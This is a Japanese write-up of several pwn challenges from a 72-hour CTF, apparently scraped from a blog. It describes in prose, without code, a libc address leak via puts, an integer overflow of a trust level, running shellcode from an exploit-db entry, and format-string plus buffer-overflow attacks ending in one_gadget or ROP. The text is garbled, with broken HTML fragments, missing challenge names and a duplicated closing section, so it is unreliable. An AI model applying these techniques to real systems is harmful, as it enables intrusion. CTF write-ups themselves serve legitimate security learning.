$$ (ab)' = a'b + ab' $$ らしいです。答えは省略。</p>

xoronly</h1>
stack上に無限に書き込むことができます。書き込みは既にある値とxorが取られれます。xor後の文字列は`puts</code>されます。</p>`

aslr leak</h3>
`__libc_start_main</code>のアドレスをputs(buf)</code>でleakします。</p>`

ainque</h1>
The provided kernel module can load riscv ELF binary and run it in kernel context.</p>

exploit</h2>
`detrust</code>を0x7fffffff</code>にすることでtrust_level</code>を0x80000001</code>にすることができます。あとはこれに2を足す処理を行うとtrust_level</code>が0x7fffffff</code>になりflagが得られます。</p>`

概要</h2>
任意のshellcodeを実行してくれます。</p>

exploit</h2>
https://www.exploit-db.com/exploits/42179 を送るとシェルが降ってきます。</p>

脆弱性</h2>
自明なFSBとBoFがあります。</p>

攻撃</h2>
FSBを使ってlibc leakをし、BoFでmainにリターンします。その後、one_gadgetを利用してシェルを取ります。</p>

脆弱性</h2>
ogと同様にFSBとBoFがあります。</p>

攻撃</h2>
FSBを使ってlibc leakをし、BoFでmainにリターンします。その後ROPをします。</p>

脆弱性</h2>
ソースコードにもわかりやすく書いてある通り、`gets</code>が使われています。</p>`

`[pwn] LossLess</h1> WIP</p> [misc] aNyFT</h1> WIP</p> 終わりに</h1> 72時間CTFはいいですね。頭を冷やす時間あって、ゆっくり考えることができました。</p> 唯一の不満はヒープガチャがなかったことですね。寂しかった。</p>`

[misc] aNyFT</h1>
WIP</p>

終わりに</h1>
72時間CTFはいいですね。頭を冷やす時間あって、ゆっくり考えることができました。</p>
唯一の不満はヒープガチャがなかったことですね。寂しかった。</p>